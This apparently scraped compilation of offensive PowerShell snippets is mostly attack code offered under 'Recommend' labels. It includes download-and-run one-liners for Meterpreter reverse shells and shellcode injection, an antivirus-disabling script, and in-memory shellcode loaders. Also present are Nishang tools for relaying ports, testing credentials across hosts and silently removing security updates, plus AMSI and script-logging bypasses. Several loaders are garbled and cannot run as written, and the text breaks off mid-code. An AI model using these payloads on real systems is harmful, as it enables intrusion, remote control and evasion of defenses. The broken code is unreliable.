http://learningpcs.blogspot.com/2012/06/powershell-v2-function-convertfrom.html
http://www.labofapenetrationtester.com/2016/11/exfiltration-of-user-credentials-using-wlan-ssid.html
https://github.com/samratashok/nishang
# Applies ROT13 to $rot13string: a-m / A-M move forward 13 places, n-z / N-Z move back 13,
# and every other character is copied through unchanged.
#   $rot13string - text to transform; omitted or empty input yields an empty string
# Returns the transformed string. ROT13 is its own inverse, so the same call decodes.
function ConvertTo-ROT13
{
  [CmdletBinding()] param (
    [Parameter(Mandatory = $False)]
    [String]
    $rot13string
  )
  $rotated = foreach ($ch in $rot13string.ToCharArray()) {
    $code = [int]$ch
    $firstHalf = ($code -ge 97 -and $code -le 109) -or ($code -ge 65 -and $code -le 77)
    $secondHalf = ($code -ge 110 -and $code -le 122) -or ($code -ge 78 -and $code -le 90)
    if ($firstHalf) {
      [char]($code + 13)
    } elseif ($secondHalf) {
      [char]($code - 13)
    } else {
      $ch
    }
  }
  # -join of an empty/null sequence is "", matching the original's [String] accumulator.
  [String](-join $rotated)
}
# Recommend
iex (iwr https:// raw.githubusercontent.com / PowerShellMafia/ PowerSploit/ master/ Exfiltration/ Invoke-Meterpreter.ps1 );Invoke-Meterpreter - payload windows/ meterpreter/ reverse_tcp - lhost 192.168 .1.100 - lport 4444
Invoke-GenericPowershellTcp
# Recommend
iex (iwr https:// raw.githubusercontent.com / PowerShellMafia/ PowerSploit/ master/ Exfiltration/ Invoke-ReflectivePEInjection.ps1 );Invoke-ReflectivePEInjection - PEBytes $bytes - EntryPoint $entry - Show
# Recommend
iex (iwr https:// raw.githubusercontent.com / PowerShellMafia/ PowerSploit/ master/ Exfiltration/ Invoke-ReflectivePEInjection.ps1 );Invoke-ReflectivePEInjection - PEBytes $bytes - EntryPoint $entry - Show
# Recommend
iex (iwr https:// raw.githubusercontent.com / PowerShellMafia/ PowerSploit/ master/ Exfiltration/ Invoke-ReflectivePEInjection.ps1 );Invoke-ReflectivePEInjection - PEBytes $bytes - EntryPoint $entry - Show
# Recommend
iex (iwr https:// raw.githubusercontent.com / PowerShellMafia/ PowerSploit/ master/ Exfiltration/ Invoke-ReflectivePEInjection.ps1 );Invoke-ReflectivePEInjection - PEBytes $bytes - EntryPoint $entry - Show
IEX(New-Object Net.WebClient).DownloadString(' https://raw.githubusercontent.com/xorrior/RandomPS-Scripts/refs/heads/master/DisableCylance.ps1' ); Invoke-CylanceDisarm - ProcessID 4444 - DisableMemDef
https://github.com/danielbohannon/Invoke-Obfuscation
# Recommend
iex (iwr https:// raw.githubusercontent.com / peewpw/ Invoke-PSImage / master/ Invoke-PSImage.ps1 );Invoke-PSImage - ScriptBlock {powershell.exe - nop - w hidden - c " IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.1:8080/Invoke-Shellcode.ps1')" } - Out C:\Windows\Temp\test.png - Image C:\Windows\Temp\test.jpg
Invoke-ReflectivePEInjection
# Recommend
iex (iwr https:// raw.githubusercontent.com / PowerShellMafia/ PowerSploit/ master/ Exfiltration/ Invoke-ReflectivePEInjection.ps1 );Invoke-ReflectivePEInjection - PEBytes $bytes - EntryPoint $entry - ShowWindow
Invoke-ReflectivePEInjection.ps1
# In-memory loader skeleton (despite the name, it does not appear to be the PowerSploit function: it
# takes $EntryPoint as a byte array and relies on a `Get-ProcAddress` helper that is not defined on
# this page, so it cannot run as written).
# Defender notes: VirtualAlloc with 0x3000/0x40 (MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE)
# followed by CreateThread inside a powershell.exe host is a common in-memory execution indicator;
# Constrained Language Mode blocks the Marshal/GetDelegateForFunctionPointer calls used here, and the
# unmanaged buffer from AllocHGlobal is never freed.
function Invoke-ReflectivePEInjection {
param (
[Parameter (Mandatory = $true )]
[ValidateScript ({ $_.Length -gt 0 })]
[byte []]
$PEBytes ,
[Parameter (Mandatory = $true )]
[ValidateScript ({ $_.Length -gt 0 })]
[byte []]
$EntryPoint ,
[Switch ]
$ShowWindow
)
$ptr = [System.Runtime.InteropServices.Marshal ]::AllocHGlobal($PEBytes.Length )
[System.Runtime.InteropServices.Marshal ]::Copy($PEBytes , 0 , $ptr , $PEBytes.Length )
$kernel32 = [System.Runtime.InteropServices.Marshal ]::GetDelegateForFunctionPointer((Get-ProcAddress kernel32.dll LoadLibraryA), [System.Func [System.String , IntPtr ]])
$kernel32.Invoke (" kernel32.dll" )
$ntdll = [System.Runtime.InteropServices.Marshal ]::GetDelegateForFunctionPointer((Get-ProcAddress ntdll.dll RtlCreateUserThread), [System.Func [IntPtr , IntPtr , IntPtr , IntPtr , IntPtr , IntPtr , IntPtr ]])
$ntdll.Invoke ($ptr , 0 , 0 , 0 , 0 , 0 , 0 )
$kernel32 = [System.Runtime.InteropServices.Marshal ]::GetDelegateForFunctionPointer((Get-ProcAddress kernel32.dll VirtualAlloc), [System.Func [IntPtr , IntPtr , IntPtr , IntPtr , IntPtr ]])
$kernel32.Invoke ($ptr , $EntryPoint.Length , 0x3000 , 0x40 , 0x4 )
$kernel32 = [System.Runtime.InteropServices.Marshal ]::GetDelegateForFunctionPointer((Get-ProcAddress kernel32.dll RtlCopyMemory), [System.Func [IntPtr , IntPtr , IntPtr , IntPtr ]])
$kernel32.Invoke ($EntryPoint , $ptr , $EntryPoint.Length )
$kernel32 = [System.Runtime.InteropServices.Marshal ]::GetDelegateForFunctionPointer((Get-ProcAddress kernel32.dll CreateThread), [System.Func [IntPtr , IntPtr , IntPtr , IntPtr , IntPtr , IntPtr ]])
$kernel32.Invoke ($ptr , 0 , 0 , 0 , 0 , 0 )
}
# Recommend
$PEBytes = [System.IO.File ]::ReadAllBytes(" C:\path\to\your\payload.dll" )
$EntryPoint = [System.IO.File ]::ReadAllBytes(" C:\path\to\your\payload.dll" )
$PEBytes = [System.Text.Encoding ]::UTF8.GetBytes($PEBytes )
$EntryPoint = [System.Text.Encoding ]::UTF8.GetBytes($EntryPoint )
$kernel32 = [System.Runtime.InteropServices.Marshal ]::GetDelegateForFunctionPointer((Get-ProcAddress kernel32.dll VirtualAlloc), [System.Func [IntPtr , IntPtr , IntPtr , IntPtr , IntPtr ]])
$ptr = $kernel32.Invoke (0 , $EntryPoint.Length , 0x3000 , 0x40 , 0x4 )
$kernel32 = [System.Runtime.InteropServices.Marshal ]::GetDelegateForFunctionPointer((Get-ProcAddress kernel32.dll RtlCopyMemory), [System.Func [IntPtr , IntPtr , IntPtr , IntPtr ]])
$kernel32.Invoke ($ptr , $EntryPoint , $EntryPoint.Length )
$kernel32 = [System.Runtime.InteropServices.Marshal ]::GetDelegateForFunctionPointer((Get-ProcAddress kernel32.dll CreateThread), [System.Func [IntPtr , IntPtr , IntPtr , IntPtr , IntPtr , IntPtr ]])
$kernel32.Invoke (0 , 0 , $ptr , 0 , 0 )
Invoke-Shellcode From Base64
$Shellcode = [System.Convert ]::FromBase64String(" base64 encoded shellcode" )
$Shellcode = [System.Text.Encoding ]::UTF8.GetBytes($Shellcode )
$kernel32 = [System.Runtime.InteropServices.Marshal ]::GetDelegateForFunctionPointer((Get-ProcAddress kernel32.dll VirtualAlloc), [System.Func [IntPtr , IntPtr , IntPtr , IntPtr , IntPtr ]])
$ptr = $kernel32.Invoke (0 , $Shellcode.Length , 0x3000 , 0x40 , 0x4 )
$kernel32 = [System.Runtime.InteropServices.Marshal ]::GetDelegateForFunctionPointer((Get-ProcAddress kernel32.dll RtlCopyMemory), [System.Func [IntPtr , IntPtr , IntPtr , IntPtr ]])
$kernel32.Invoke ($ptr , $Shellcode , $Shellcode.Length )
$kernel32 = [System.Runtime.InteropServices.Marshal ]::GetDelegateForFunctionPointer((Get-ProcAddress kernel32.dll CreateThread), [System.Func [IntPtr , IntPtr , IntPtr , IntPtr , IntPtr , IntPtr ]])
$kernel32.Invoke (0 , 0 , $ptr , 0 , 0 )
Invoke-Shellcode From File
$Shellcode = [System.IO.File ]::ReadAllBytes(" C:\path\to\your\shellcode.bin" )
$Shellcode = [System.Text.Encoding ]::UTF8.GetBytes($Shellcode )
$kernel32 = [System.Runtime.InteropServices.Marshal ]::GetDelegateForFunctionPointer((Get-ProcAddress kernel32.dll VirtualAlloc), [System.Func [IntPtr , IntPtr , IntPtr , IntPtr , IntPtr ]])
$ptr = $kernel32.Invoke (0 , $Shellcode.Length , 0x3000 , 0x40 , 0x4 )
$kernel32 = [System.Runtime.InteropServices.Marshal ]::GetDelegateForFunctionPointer((Get-ProcAddress kernel32.dll RtlCopyMemory), [System.Func [IntPtr , IntPtr , IntPtr , IntPtr ]])
$kernel32.Invoke ($ptr , $Shellcode , $Shellcode.Length )
$kernel32 = [System.Runtime.InteropServices.Marshal ]::GetDelegateForFunctionPointer((Get-ProcAddress kernel32.dll CreateThread), [System.Func [IntPtr , IntPtr , IntPtr , IntPtr , IntPtr , IntPtr ]])
$kernel32.Invoke (0 , 0 , $ptr , 0 , 0 )
Invoke-Shellcode From String
$Shellcode = [System.Convert ]::FromBase64String(" base64 encoded shellcode" )
$Shellcode = [System.Text.Encoding ]::UTF8.GetBytes($Shellcode )
$kernel32 = [System.Runtime.InteropServices.Marshal ]::GetDelegateForFunctionPointer((Get-ProcAddress kernel32.dll VirtualAlloc), [System.Func [IntPtr , IntPtr , IntPtr , IntPtr , IntPtr ]])
$ptr = $kernel32.Invoke (0 , $Shellcode.Length , 0x3000 , 0x40 , 0x4 )
$kernel32 = [System.Runtime.InteropServices.Marshal ]::GetDelegateForFunctionPointer((Get-ProcAddress kernel32.dll RtlCopyMemory), [System.Func [IntPtr , IntPtr , IntPtr , IntPtr ]])
$kernel32.Invoke ($ptr , $Shellcode , $Shellcode.Length )
$kernel32 = [System.Runtime.InteropServices.Marshal ]::GetDelegateForFunctionPointer((Get-ProcAddress kernel32.dll CreateThread), [System.Func [IntPtr , IntPtr , IntPtr , IntPtr , IntPtr , IntPtr ]])
$kernel32.Invoke (0 , 0 , $ptr , 0 , 0 )
Invoke-Shellcode InteropService Marshal
# Copies the UTF-8 bytes of a placeholder string into unmanaged heap memory (AllocHGlobal + Marshal.Copy).
# Nothing is returned and the allocation is never released (no FreeHGlobal), so every call leaks
# $shellcode.Length bytes for the life of the process.
function Invoke-Shellcode {
$shellcode = [System.Text.Encoding ]::UTF8.GetBytes(" Insert-ShellCode-Here" )
$ptr = [System.Runtime.InteropServices.Marshal ]::AllocHGlobal($shellcode.Length )
[System.Runtime.InteropServices.Marshal ]::Copy($shellcode , 0 , $ptr , $shellcode.Length )
}
Invoke-Shellcode (PowerSploit)
# Recommend
iex (iwr https:// raw.githubusercontent.com / PowerShellMafia/ PowerSploit/ master/ CodeExecution/ Invoke-Shellcode.ps1 );Invoke-Shellcode - Payload windows/ meterpreter/ reverse_tcp - Lhost 192.168 .1.100 - Lport 4444 - Force
# Recommend
$Image = [System.Drawing.Image ]::FromFile(" C:\path\to\your\image.png" )
$Bytes = [System.Text.Encoding ]::UTF8.GetBytes(" powershell.exe -nop -w hidden -c $ ( [System.Text.Encoding ]::UTF8.GetString([System.Convert ]::FromBase64String(' JABeA...' ))) " )
$ImageBytes = [System.Drawing.Image ]::Clone()
$ImageBytes = $Image.PropertyItems [0 ].Value
$ImageBytes [0 .. ($Bytes.Length - 1 )] = $Bytes
$Image.PropertyItems [0 ].Value = $ImageBytes
$Image.Save (" C:\path\to\your\image.png" )
# Lists the domain controllers of the current machine's domain with their IP addresses, using
# System.DirectoryServices.ActiveDirectory.Domain under the caller's own credentials.
# Takes no parameters; note the usage line that follows passes -DomainName/-DomainController, which
# this function does not declare and would reject.
# Defender note: the same query is routine admin tooling, so correlate it with the originating
# process and account rather than alerting on the DC lookup alone.
function Resolve-DCtoIP {
PROCESS {
Write-Output " [+] Enumerating all the DCs"
ForEach ($dc in [DirectoryServices.ActiveDirectory.Domain ]::GetCurrentDomain().DomainControllers) {
Write-Output " [+] DC found: $ ( $dc.Name ) :$ ( $dc.IPAddress ) "
}
}
}
Resolve-DCToIP - DomainName " domain.local" - DomainController " dc.domain.local"
https:// raw.githubusercontent.com / BC- SECURITY/ Empire/ master/ data / module_source/ credentials/ Invoke-SessionControl.ps1
SYNOPSIS:
Nishang script which can be used to run netsh port forwarding/relaying commands on remote computers.
DESCRIPTION:
This script is a wrapper around the netsh Windows command's portproxy functionality. It can be used to create and remove
network relays between computers. The script is useful in scenarios where you want to access a port or service running on a
target computer that is reachable only through one or more intermediate computers between you and the target. Another interesting
use case is exposing a local service to the network.
AUTHOR:
http://www.labofapenetrationtester.com/2015/04/pillage-the-village-powershell-version.html
https://github.com/samratashok/nishang
EXAMPLE
PS > Invoke-NetworkRelay - Relay v4tov4 - ListenAddress 192.168 .254.141 - Listenport 8888 - ConnectAddress 192.168 .1.22 - ConnectPort 445 - ComputerName 192.168 .254.141
PS > Invoke-NetworkRelay - Relay v6tov4 - ListenAddress :: - Listenport 8888 - ConnectAddress 192.168 .1.22 - ConnectPort 445 - ComputerName 192.168 .254.141
PS > Invoke-NetworkRelay - Relay v6tov6 - ListenAddress :: - Listenport 8888 - ConnectAddress fe80::19ed :c169:128c:b68d - ConnectPort 445 - ComputerName domainpc - Username bharat\domainuser - Password Password1234
PS > Invoke-NetworkRelay - Relay v4tov4 - ListenAddress 192.168 .254.141 - Listenport 8888 - ConnectAddress 192.168 .1.22 - ConnectPort 445 - ComputerName 192.168 .254.141 - Delete
PS > Invoke-NetworkRelay - ComputerName domainpc - Username bharat\domainuser - Password Password1234 - Show
# Adds, deletes or lists netsh portproxy relays on $ComputerName (over PowerShell remoting).
#   $Relay          - relay family, one of v4tov4 / v6tov4 / v4tov6 / v6tov6 (default v4tov4)
#   $ListenAddress  - address the relay listens on (default 0.0.0.0)
#   $ListenPort     - port the relay listens on (default 8888)
#   $ConnectAddress - address the relay forwards to (mandatory in the AddOrDelete set)
#   $ConnectPort    - port the relay forwards to (mandatory in the AddOrDelete set)
#   $ComputerName   - host to configure; $UserName/$Password - optional credentials for it
#   -Delete         - remove the relay instead of adding it; -Show - list all relays (separate set)
# Each branch writes the netsh output and a confirming "show" of the relay family to the pipeline.
# Defender notes: a portproxy entry persists across reboots and is listed by
# `netsh interface portproxy show all` (what -Show runs); netsh.exe spawned via WinRM/wsmprovhost is
# the host-side artifact, so baseline portproxy configuration on servers that should have none.
function Invoke-NetworkRelay
{
[CmdletBinding (DefaultParameterSetName = " AddOrDelete" )] Param (
[Parameter (Position = 0 , Mandatory = $False , ParameterSetName = " AddOrDelete" )]
[ValidateSet (" v4tov4" , " v6tov4" , " v4tov6" , " v6tov6" )]
[String ]
$Relay = " v4tov4" ,
[Parameter (Position = 1 , Mandatory = $False , ParameterSetName = " AddOrDelete" )]
[String ]
$ListenAddress = " 0.0.0.0" ,
[Parameter (Position = 2 , Mandatory = $False , ParameterSetName = " AddOrDelete" )]
[String ]
$ListenPort = 8888 ,
[Parameter (Position = 3 , Mandatory = $True , ParameterSetName = " AddOrDelete" )]
[String ]
$ConnectAddress ,
[Parameter (Position = 4 , Mandatory = $True , ParameterSetName = " AddOrDelete" )]
[String ]
$ConnectPort ,
[Parameter (Position = 5 , Mandatory = $False , ParameterSetName = " AddOrDelete" )]
[Parameter (Position = 0 , Mandatory = $False , ParameterSetName = " Show" )]
[String ]
$ComputerName ,
[Parameter (Position = 6 , Mandatory = $False , ParameterSetName = " AddOrDelete" )]
[Parameter (Position = 1 , Mandatory = $False , ParameterSetName = " Show" )]
$UserName ,
[Parameter (Position = 7 , Mandatory = $False , ParameterSetName = " AddOrDelete" )]
[Parameter (Position = 2 , Mandatory = $False , ParameterSetName = " Show" )]
$Password ,
[Parameter (Mandatory = $False , ParameterSetName = " AddOrDelete" )]
[Switch ]
$Delete ,
[Parameter (Mandatory = $False , ParameterSetName = " Show" )]
[Switch ]
$Show
)
# Check if Username and Password are provided
# NOTE(review): $Password is a plain string parameter, so it lands in command history, transcripts and
# script block logs; accepting a PSCredential would avoid the clear-text copy.
if ($UserName -and $Password )
{
$SecurePassword = ConvertTo-SecureString $Password - AsPlainText - Force
$Creds = New-Object System.Management.Automation.PSCredential ($UserName , $SecurePassword )
}
else
{
$Creds = $False
}
if ($Show )
{
if ($Creds )
{
Invoke-Command - ScriptBlock {netsh interface portproxy show all} - ComputerName $ComputerName - Credential $Creds
}
else
{
Invoke-Command - ScriptBlock {netsh interface portproxy show all} - ComputerName $ComputerName
}
}
if (! $Delete -and ! $Show )
{
# Prepare relay commands
# These strings are built by interpolation and later turned into script blocks with
# [ScriptBlock]::Create; ValidateSet constrains $Relay, but the addresses and ports are not validated,
# so any untrusted value reaching them is executed verbatim on the remote host. Variable names differ
# only in case ($V4tov4Relay vs $V4toV4Relay below), which PowerShell treats as the same variable.
$V4tov4Relay = " netsh interface portproxy add v4tov4 listenport=$ListenPort listenaddress=$ListenAddress connectport=$ConnectPort connectaddress=$ConnectAddress protocol=tcp"
$V6toV4Relay = " netsh interface portproxy add v6tov4 listenport=$ListenPort listenaddress=$ListenAddress connectport=$ConnectPort connectaddress=$ConnectAddress "
$V4tov6Relay = " netsh interface portproxy add v4tov6 listenport=$ListenPort listenaddress=$ListenAddress connectport=$ConnectPort connectaddress=$ConnectAddress "
$V6toV6Relay = " netsh interface portproxy add v6tov6 listenport=$ListenPort listenaddress=$ListenAddress connectport=$ConnectPort connectaddress=$ConnectAddress protocol=tcp"
# Create a scriptblock depending upon the type of relay.
switch ($Relay )
{
" v4tov4"
{
$sb = [ScriptBlock ]::Create($V4toV4Relay )
Write-Output " Initiating v4tov4 Relay. Listening on $ListenAddress , Port $ListenPort . Connecting to $Connectaddress , Port $Connectport "
}
" v6tov4"
{
$sb = [ScriptBlock ]::Create($V6toV4Relay )
Write-Output " Initiating v6tov4 Relay. Listening on $ListenAddress , Port $ListenPort . Connecting to $Connectaddress , Port $Connectport "
}
" v4tov6"
{
$sb = [ScriptBlock ]::Create($V4toV6Relay )
Write-Output " Initiating v4tov6 Relay. Listening on $ListenAddress , Port $ListenPort . Connecting to $Connectaddress , Port $Connectport "
}
" v6tov6"
{
$sb = [ScriptBlock ]::Create($V6toV6Relay )
Write-Output " Initiating v6tov6 Relay. Listening on $ListenAddress , Port $ListenPort . Connecting to $Connectaddress , Port $Connectport "
}
}
# Execute the netsh command on remote computer
if ($Creds )
{
Invoke-Command - ScriptBlock $sb - ComputerName $ComputerName - Credential $Creds
Invoke-Command - ScriptBlock {param ($SBRelay ) netsh interface portproxy show $SBRelay } - ArgumentList $Relay - ComputerName $ComputerName - Credential $Creds
}
else
{
Invoke-Command - ScriptBlock $sb - ComputerName $ComputerName
# NOTE(review): $Relay inside this script block is evaluated on the remote side, where it is presumably
# undefined (the credentialed branch passes it through -ArgumentList) — verify the "show" output.
Invoke-Command - ScriptBlock {netsh interface portproxy show $Relay } - ComputerName $ComputerName
}
}
if ($Delete )
{
# Relay commands for deletion
# Deletion keys on listen address/port only, yet $ConnectAddress/$ConnectPort remain mandatory
# because they share the AddOrDelete parameter set.
$V4tov4Relay = " netsh interface portproxy delete v4tov4 listenport=$ListenPort listenaddress=$ListenAddress protocol=tcp"
$V6toV4Relay = " netsh interface portproxy delete v6tov4 listenport=$ListenPort listenaddress=$ListenAddress "
$V4tov6Relay = " netsh interface portproxy delete v4tov6 listenport=$ListenPort listenaddress=$ListenAddress "
$V6toV6Relay = " netsh interface portproxy delete v6tov6 listenport=$ListenPort listenaddress=$ListenAddress protocol=tcp"
# Create a scriptblock for deleting the relay, depending upon its type.
switch ($Relay )
{
" v4tov4"
{
$sbdelete = [ScriptBlock ]::Create($V4toV4Relay )
Write-Output " Deleting v4tov4 Relay which was listening on $ListenAddress , Port $ListenPort and connecting to $Connectaddress , Port $Connectport "
}
" v6tov4"
{
$sbdelete = [ScriptBlock ]::Create($V6toV4Relay )
Write-Output " Deleting v6tov4 Relay which was listening on $ListenAddress , Port $ListenPort and connecting to $Connectaddress , Port $Connectport "
}
" v4tov6"
{
$sbdelete = [ScriptBlock ]::Create($V4toV6Relay )
Write-Output " Deleting v4tov6 Relay which was listening on $ListenAddress , Port $ListenPort and connecting to $Connectaddress , Port $Connectport "
}
" v6tov6"
{
$sbdelete = [ScriptBlock ]::Create($V6toV6Relay )
Write-Output " Deleting v6tov6 Relay which was listening on $ListenAddress , Port $ListenPort and connecting to $Connectaddress , Port $Connectport "
}
}
# Execute the netsh command on remote computer
if ($Creds )
{
Invoke-Command - ScriptBlock $sbdelete - ComputerName $ComputerName - Credential $Creds
Invoke-Command - ScriptBlock {param ($SBRelay ) netsh interface portproxy show $SBRelay } - ArgumentList $Relay - ComputerName $ComputerName - Credential $Creds
}
else
{
Invoke-Command - ScriptBlock $sbdelete - ComputerName $ComputerName
# Same remote-scope caveat as the add branch: $Relay is presumably empty on the remote side.
Invoke-Command - ScriptBlock {netsh interface portproxy show $Relay } - ComputerName $ComputerName
}
}
}
SYNOPSIS:
Nishang script which can check for credentials on remote computers and can open PSSessions if the credentials work.
DESCRIPTION:
The payload uses WMI to check a credential against given list of computers. Use the -Creds parameter to specify username and password. If the script is run
from a powershell session with local or global admin credentials (or from a powershell session started with hashes of such account using WCE), it should be used
without the -Creds parameter. Use the -CreateSessions parameter to create PSSessions.
EXAMPLE:
PS > Create- MultipleSessions - filename .\servers.txt
PS > Create- MultipleSessions - filename .\servers.txt - Creds
PS > Create- MultipleSessions - filename .\servers.txt - CreateSessions
AUTHOR:
http://labofapenetrationtester.blogspot.com/2013/04/poshing-the-hashes.html
https://github.com/samratashok/nishang
CODE:
# Tests whether the current (or a prompted) credential works on each host listed in $filename by
# running a WMI query against it; with -CreateSessions, opens a PSSession to every host that answered.
#   $filename       - text file with one computer name/address per line
#   -Creds          - prompt for a credential (Get-Credential) instead of using the caller's own
#   -CreateSessions - open a New-PSSession to each reachable host, then list all sessions
#   -VerboseErrors  - keep error output; by default errors are silenced for the whole function
# Writes per-host success/failure lines; with -CreateSessions the session objects and Get-PSSession
# output also reach the pipeline.
# Defender notes: each probe is a remote WMI/DCOM connection followed, on success, by a WinRM
# session, so one source touching many hosts in a short window stands out in network logon
# (typically 4624/4625, logon type 3) and WinRM listener telemetry.
function Create-MultipleSessions
{
[CmdletBinding ()] Param (
[Parameter (Position = 0 , Mandatory = $True )]
[String ]
$filename ,
[Parameter (Mandatory = $False )]
[Switch ]
$Creds ,
[Parameter (Mandatory = $False )]
[Switch ]
$CreateSessions ,
[Parameter (Mandatory = $False )]
[Switch ]
$VerboseErrors
)
# Function-scoped preference: every error below is hidden unless -VerboseErrors is given.
$ErrorActionPreference = " SilentlyContinue"
if ($VerboseErrors )
{
$ErrorActionPreference = " Continue"
}
$servers = Get-Content $filename
if ($Creds )
{
$Credentials = Get-Credential
# Single-quoted, so $server/$Credentials are expanded only when Invoke-Expression runs the text.
# NOTE(review): direct cmdlet calls with splatting would do the same without Invoke-Expression.
$CheckCommand = ' gwmi -query "Select IPAddress From Win32_NetworkAdapterConfiguration Where IPEnabled = True" -ComputerName $server -Credential $Credentials'
$SessionCommand = ' New-PSSession -ComputerName $server -Credential $Credentials'
}
else
{
$CheckCommand = ' gwmi -query "Select IPAddress From Win32_NetworkAdapterConfiguration Where IPEnabled = True" -ComputerName $server'
$SessionCommand = ' New-PSSession -ComputerName $server'
}
foreach ($server in $servers )
{
$check = Invoke-Expression $CheckCommand
# When $check is an array, `-ne $null` filters it rather than comparing; the result is still truthy
# for a non-empty answer and $null/empty when the query failed, which is all the branch needs.
if ($check -ne $null )
{
Write-Host " Credentials worked on $server !!" - ForegroundColor Green
if ($CreateSessions -eq $True )
{
" `n Creating Session for $server "
Invoke-Expression $SessionCommand
}
}
else
{
" Could not connect or credentials didn't work on $server "
}
}
if ($CreateSessions -eq $True )
{
Write-Host " `n Following Sessions have been created: " - ForegroundColor Green
Get-PSSession
}
}
# Prompts for an update ID and tries to remove the matching Win32_QuickFixEngineering instance via WMI.
# NOTE(review): the command text is a double-quoted string, so `$_` and `$UpdateID` are expanded while
# the string is assembled (before Where-Object runs) — check the resulting text before trusting it to
# match anything. The second Remove-Update defined further down (wusa.exe based) supersedes this one,
# and a later definition of the same name replaces this function in the session.
function Remove-Update
{
$UpdateID = Read-Host " Enter the UpdateID to remove"
$Command = " Get-WmiObject -Class Win32_QuickFixEngineering | Where-Object {$_ .HotFixID -eq $UpdateID } | Remove-WmiObject"
Invoke-Expression $Command
}
SYNOPSIS:
Nishang Payload which silently removes updates for a target machine.
DESCRIPTION:
This payload removes updates from a target machine. This could be
used to remove all updates, all security updates or a particular update.
AUTHOR:
http://trevorsullivan.net/2011/05/31/powershell-removing-software-updates-from-windows/
https://github.com/samratashok/nishang
EXAMPLE:
PS > Remove-Update All
PS > Remove-Update Security
PS > Remove-Update KB2761226
CODE:
# Uninstalls installed hotfixes through `wusa.exe /uninstall /kb:<n> /quiet /norestart`.
#   $KBID - a specific ID such as KB2761226, "All" for every hotfix, or "Security" for hotfixes
#           whose Description contains "Security"
# Writes a progress line per removal; blocks until the spawned wusa.exe has exited.
# Defender notes: silent removal of security updates is a defense-evasion step, not maintenance —
# wusa.exe with /uninstall and /quiet in process-creation logs (4688 / Sysmon 1) from a PowerShell
# parent is the host artifact, and the Setup event log records the uninstall.
function Remove-Update {
[CmdletBinding ()] Param (
[Parameter (Position = 0 , Mandatory = $True )]
[String ]
$KBID
)
$HotFixes = Get-HotFix
foreach ($HotFix in $HotFixes )
{
if ($KBID -eq $HotFix.HotfixId )
{
# Exact match: strip the "KB" prefix for wusa (this reassigns $KBID) and stop after one removal.
$KBID = $HotFix.HotfixId.Replace (" KB" , " " )
$RemovalCommand = " wusa.exe /uninstall /kb:$KBID /quiet /norestart"
Write-Host " Removing $KBID from the target."
Invoke-Expression $RemovalCommand
break
}
if ($KBID -match " All" )
{
$KBNumber = $HotFix.HotfixId.Replace (" KB" , " " )
$RemovalCommand = " wusa.exe /uninstall /kb:$KBNumber /quiet /norestart"
Write-Host " Removing update $KBNumber from the target."
Invoke-Expression $RemovalCommand
}
if ($KBID -match " Security" )
{
if ($HotFix.Description -match " Security" )
{
$KBSecurity = $HotFix.HotfixId.Replace (" KB" , " " )
$RemovalCommand = " wusa.exe /uninstall /kb:$KBSecurity /quiet /norestart"
Write-Host " Removing Security Update $KBSecurity from the target."
Invoke-Expression $RemovalCommand
}
}
# wusa.exe returns immediately; poll until no wusa process remains so removals run one at a time.
while (@ (Get-Process wusa - ErrorAction SilentlyContinue).Count -ne 0 )
{
Start-Sleep 3
Write-Host " Waiting for update removal to finish ..."
}
}
}
# Usage
$browser = New-Object System.Net.WebClient; $browser.Proxy.Credentials = [System.Net.CredentialCache ]::DefaultNetworkCredentials; iex($browser.downloadstring (" https://raw.githubusercontent.com/d0nkeys/redteam/master/code-execution/Invoke" + " -" + " Bypass.ps1" ));
iex " $ ( Get-Command ' Invoke-Bypass-*-AMSI' ) "
iex " $ ( Get-Command ' Invoke-Bypass-*-AMSI2' ) "
iex " $ ( Get-Command ' Invoke-Bypass-*-ScriptBlockLog' ) "
iex " $ ( Get-Command ' Invoke-Bypass-*-UACSilentCleanup' ) -Command cmd.exe"
$id = random
iex @"
function Invoke-Bypass-$id -ScriptBlockLog {
# cobbr's Script Block Logging bypass
`$ GPF=[ref].Assembly.GetType('System.Management.Automation.Utils').GetField('cachedGroupPolicySettings','N'+'onPublic,Static');
If(`$ GPF){
`$ GPC=`$ GPF.GetValue(`$ null);
If(`$ GPC['ScriptB'+'lockLogging']){
`$ GPC['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;
`$ GPC['ScriptB'+'lockLogging']['EnableScriptB'+'lockInvocationLogging']=0
}
`$ val=[Collections.Generic.Dictionary[string,System.Object]]::new();
`$ val.Add('EnableScriptB'+'lockLogging',0);
`$ val.Add('EnableScriptB'+'lockInvocationLogging',0);
`$ GPC['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptB'+'lockLogging']=`$ val
} Else {
[ScriptBlock].GetField('signatures','N'+'onPublic,Static').SetValue(`$ null,(New-Object Collections.Generic.HashSet[string]))
}
}
"@ ;
iex @"
function Invoke-Bypass-$id -AMSI {
# @mattifestation's AMSI bypass
`$ Ref=[Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils');
`$ Ref.GetField('amsiIn'+'itFailed','NonPublic,Static').SetValue(`$ null,`$ true);
}
"@ ;
iex @"
function Invoke-Bypass-$id -AMSI2 {
# rastamouse's AMSI bypass (Add-Type writes *.cs on disk!!)
`$ Ref = (
"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
"System.Runtime.InteropServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a"
);
`$ Source = @"
using System;
using System.Runtime.InteropServices;
namespace Bypass$id
{
public class AMSI$id
{
[DllImport("kernel32")]
public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
[DllImport("kernel32")]
public static extern IntPtr LoadLibrary(string name);
[DllImport("kernel32")]
public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
[DllImport("Kernel32.dll", EntryPoint = "RtlMoveMemory", SetLastError = false)]
static extern void MoveMemory(IntPtr dest, IntPtr src, int size);
public static int Disable()
{
string hexbuffer = "41 6d 73 69 53 63 61 6e 42 75 66 66 65 72";
string buffer="";
string[] hexbuffersplit = hexbuffer.Split(' ');
foreach (String hex in hexbuffersplit)
{
int value = Convert.ToInt32(hex, 16);
buffer+= Char.ConvertFromUtf32(value);
}
IntPtr Address = GetProcAddress(LoadLibrary("a"+ "msi"+ ".dl" +"l"), buffer);
UIntPtr size = (UIntPtr)5;
uint p = 0;
VirtualProtect(Address, size, 0x40, out p);
byte c1=0xB8,c2=0x80;
